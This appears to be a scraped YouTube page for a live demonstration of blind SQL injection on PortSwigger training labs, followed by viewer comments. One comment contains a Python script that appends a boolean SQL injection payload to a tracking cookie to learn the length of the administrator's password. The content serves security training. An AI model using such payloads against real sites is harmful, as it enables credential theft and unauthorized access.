[LIVE] Blind SQL Injection - PortSwigger Labs
HTML-код
- Опубликовано: 23 май 2024
- Welcome to my Web Application Penetration Testing Bible playlist! In this series, I'll demonstrate practical, live testing on PortSwigger Labs, covering SQL Injection, XSS, CSRF, file inclusion vulnerabilities, and more. Perfect for beginners and seasoned pros, join me to enhance your web security skills.
🔒 Welcome to The Cyber Expert! 🔒
🌐 Website: thetce.com
❤️ Support the channel by donating at: thetce.com/support
🌟 Join our vibrant community on Discord: / discord
🔔 Join this channel and unlock exclusive perks:
/ @thecyberexpert
📺 Visit My Channel For More Exciting Videos:
/ @thecyberexpert
🌎 Where else can you find me? 🌎
🔬 GITHUB: www.github.com/Hellsender01
📷 INSTAGRAM: / harshitjoshi01
🔗 LINKEDIN: / harshitjoshi01
🐦 TWITTER: / thecyberexpert_
📧 EMAIL: hj202001@gmail.com
🙏 Thank you for watching! 🙏
🔥 Stay tuned for the latest updates and intriguing content from The Cyber Expert.
🎵 Music in this video: "The Way" by LiQWYD
🎧 Free Download / Stream: bit.ly/3HGU9tD
🎵 Music promoted by Audio Library: • The Way - LiQWYD (No C...
✨ Remember to like, share, and subscribe for more engaging cybersecurity adventures. Stay ahead in the cyber world with The Cyber Expert! ✨
#thecyberexpert
#harshitjoshi
#sqli - Наука
Very knowledgeable content❤
Kya yaha par if condition ka bhi use kar sakte hai?
Sir make basic python series
Chai aur code channel per he bhai😅 best coding teacher
# Feelin' lazy? I gotcha!
# to determine length
import requests
import time
url = 'localhost' # change this
def get_length():
for i in range(1, 33):
cookie = {'TrackingId':'xxxxxxxx', 'session':'xxxxxxxxxx'} # change this
payload = f"' and length((select password from users where username='administrator'))= {i} --"
cookie['TrackingId'] = cookie['TrackingId'] + payload
r = requests.get(url, cookies=cookie, timeout=10) # Set a timeout of 10 seconds
if 'Welcome back!' in r.text:
return i
length = get_length()
print(f"Password length: {length}")
Half Code where is the get_data()???
@@__pain__05 you are more than lazy
@@sareer bro i have already Done it 😂
I was pointing you that u have done it half.
@@sareer i want to put my code but i know by putting code it will never help people
Because lazy people will use this code not smart people 🙂
@@__pain__05 see my other comment